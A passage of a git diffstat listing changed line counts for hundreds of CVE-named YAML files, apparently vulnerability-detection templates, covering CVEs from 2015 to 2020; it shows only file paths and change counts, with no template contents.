http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 4 ++-- http/cves/2015/CVE-2015-9414.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 4 ++-- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000128.yaml | 4 ++-- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 4 ++-- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 4 ++-- http/cves/2016/CVE-2016-1000135.yaml | 4 ++-- http/cves/2016/CVE-2016-1000136.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 4 ++-- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000139.yaml | 2 +- http/cves/2016/CVE-2016-1000140.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000143.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000152.yaml | 4 ++-- http/cves/2016/CVE-2016-1000153.yaml | 4 ++-- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 4 ++-- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 4 ++-- http/cves/2016/CVE-2016-10940.yaml | 2 +- http/cves/2016/CVE-2016-10956.yaml | 4 ++-- http/cves/2016/CVE-2016-10960.yaml | 4 ++-- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 4 ++-- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 4 ++-- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 4 ++-- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-6601.yaml | 4 ++-- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 4 ++-- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 2 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 2 +- http/cves/2017/CVE-2017-1000170.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 4 ++-- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 4 ++-- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12542.yaml | 4 ++-- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 4 ++-- http/cves/2017/CVE-2017-12617.yaml | 4 ++-- http/cves/2017/CVE-2017-12629.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14537.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15647.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 4 ++-- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17731.yaml | 4 ++-- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5487.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 4 ++-- http/cves/2017/CVE-2017-5982.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 4 ++-- http/cves/2017/CVE-2017-8229.yaml | 4 ++-- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 4 ++-- http/cves/2017/CVE-2017-9822.yaml | 4 ++-- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2017/CVE-2017-9841.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 4 ++-- http/cves/2018/CVE-2018-0296.yaml | 4 ++-- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 4 ++-- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 4 ++-- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10822.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 4 ++-- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 4 ++-- http/cves/2018/CVE-2018-11784.yaml | 4 ++-- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12054.yaml | 2 +- http/cves/2018/CVE-2018-1207.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 4 ++-- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 4 ++-- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-1273.yaml | 2 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 4 ++-- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 4 ++-- http/cves/2018/CVE-2018-14064.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 4 ++-- http/cves/2018/CVE-2018-14728.yaml | 4 ++-- http/cves/2018/CVE-2018-14912.yaml | 4 ++-- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 4 ++-- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16059.yaml | 4 ++-- http/cves/2018/CVE-2018-16133.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 4 ++-- http/cves/2018/CVE-2018-16283.yaml | 4 ++-- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 4 ++-- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 6 +++--- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 4 ++-- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 4 ++-- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- http/cves/2018/CVE-2018-18777.yaml | 2 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 4 ++-- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19136.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 4 ++-- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 4 ++-- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 4 ++-- http/cves/2018/CVE-2018-19458.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20463.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 4 ++-- http/cves/2018/CVE-2018-20526.yaml | 4 ++-- http/cves/2018/CVE-2018-20608.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 4 ++-- http/cves/2018/CVE-2018-2392.yaml | 4 ++-- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 4 ++-- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-3760.yaml | 4 ++-- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 4 ++-- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 4 ++-- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7490.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 4 ++-- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 4 ++-- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7719.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 5 +++-- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9161.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2018/CVE-2018-9995.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 4 ++-- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 4 ++-- http/cves/2019/CVE-2019-10068.yaml | 4 ++-- http/cves/2019/CVE-2019-10092.yaml | 4 ++-- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 4 ++-- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 4 ++-- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 4 ++-- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 10 +++++----- http/cves/2019/CVE-2019-11580.yaml | 3 ++- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 4 ++-- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 4 ++-- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 4 ++-- http/cves/2019/CVE-2019-12616.yaml | 4 ++-- http/cves/2019/CVE-2019-12725.yaml | 4 ++-- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 4 ++-- http/cves/2019/CVE-2019-12986.yaml | 4 ++-- http/cves/2019/CVE-2019-12987.yaml | 4 ++-- http/cves/2019/CVE-2019-12988.yaml | 4 ++-- http/cves/2019/CVE-2019-12990.yaml | 4 ++-- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 4 ++-- http/cves/2019/CVE-2019-14205.yaml | 4 ++-- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 4 ++-- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 4 ++-- http/cves/2019/CVE-2019-14530.yaml | 4 ++-- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 4 ++-- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 4 ++-- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 4 ++-- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 4 ++-- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 4 ++-- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16097.yaml | 4 ++-- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 4 ++-- http/cves/2019/CVE-2019-16313.yaml | 4 ++-- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-1653.yaml | 4 ++-- http/cves/2019/CVE-2019-16662.yaml | 4 ++-- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 4 ++-- http/cves/2019/CVE-2019-16997.yaml | 4 ++-- http/cves/2019/CVE-2019-17270.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 4 ++-- http/cves/2019/CVE-2019-17444.yaml | 4 ++-- http/cves/2019/CVE-2019-17503.yaml | 2 +- http/cves/2019/CVE-2019-17506.yaml | 4 ++-- http/cves/2019/CVE-2019-17538.yaml | 4 ++-- http/cves/2019/CVE-2019-17558.yaml | 4 ++-- http/cves/2019/CVE-2019-17574.yaml | 4 ++-- http/cves/2019/CVE-2019-17662.yaml | 4 ++-- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-18665.yaml | 4 ++-- http/cves/2019/CVE-2019-18818.yaml | 4 ++-- http/cves/2019/CVE-2019-18922.yaml | 4 ++-- http/cves/2019/CVE-2019-18957.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19781.yaml | 4 ++-- http/cves/2019/CVE-2019-19824.yaml | 4 ++-- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 4 ++-- http/cves/2019/CVE-2019-20210.yaml | 4 ++-- http/cves/2019/CVE-2019-20224.yaml | 4 ++-- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2579.yaml | 2 +- http/cves/2019/CVE-2019-2588.yaml | 4 ++-- http/cves/2019/CVE-2019-2616.yaml | 4 ++-- http/cves/2019/CVE-2019-2725.yaml | 4 ++-- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 4 ++-- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 4 ++-- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 4 ++-- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 4 ++-- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 4 ++-- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 4 ++-- http/cves/2019/CVE-2019-7254.yaml | 4 ++-- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 4 ++-- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 4 ++-- http/cves/2019/CVE-2019-7481.yaml | 4 ++-- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 4 ++-- http/cves/2019/CVE-2019-8086.yaml | 4 ++-- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 4 ++-- http/cves/2019/CVE-2019-9041.yaml | 4 ++-- http/cves/2019/CVE-2019-9618.yaml | 4 ++-- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 2 +- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 18 +++++++----------- http/cves/2020/CVE-2020-0618.yaml | 4 ++-- http/cves/2020/CVE-2020-10148.yaml | 2 +- http/cves/2020/CVE-2020-10199.yaml | 4 ++-- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10549.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 4 ++-- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11450.yaml | 4 ++-- http/cves/2020/CVE-2020-11455.yaml | 4 ++-- http/cves/2020/CVE-2020-11529.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 4 ++-- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 4 ++-- http/cves/2020/CVE-2020-11738.yaml | 4 ++-- http/cves/2020/CVE-2020-11798.yaml | 4 ++-- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 4 ++-- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 2 +- http/cves/2020/CVE-2020-12124.yaml | 6 +++--- http/cves/2020/CVE-2020-12127.yaml | 4 ++-- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12259.yaml | 2 +- http/cves/2020/CVE-2020-12447.yaml | 4 ++-- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 4 ++-- http/cves/2020/CVE-2020-13117.yaml | 4 ++-- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 4 ++-- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 4 ++-- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 4 ++-- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13851.yaml | 4 ++-- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13942.yaml | 4 ++-- http/cves/2020/CVE-2020-13945.yaml | 4 ++-- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 4 ++-- http/cves/2020/CVE-2020-14181.yaml | 4 ++-- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 4 ++-- http/cves/2020/CVE-2020-14864.yaml | 4 ++-- http/cves/2020/CVE-2020-14882.yaml | 4 ++-- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 4 ++-- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml 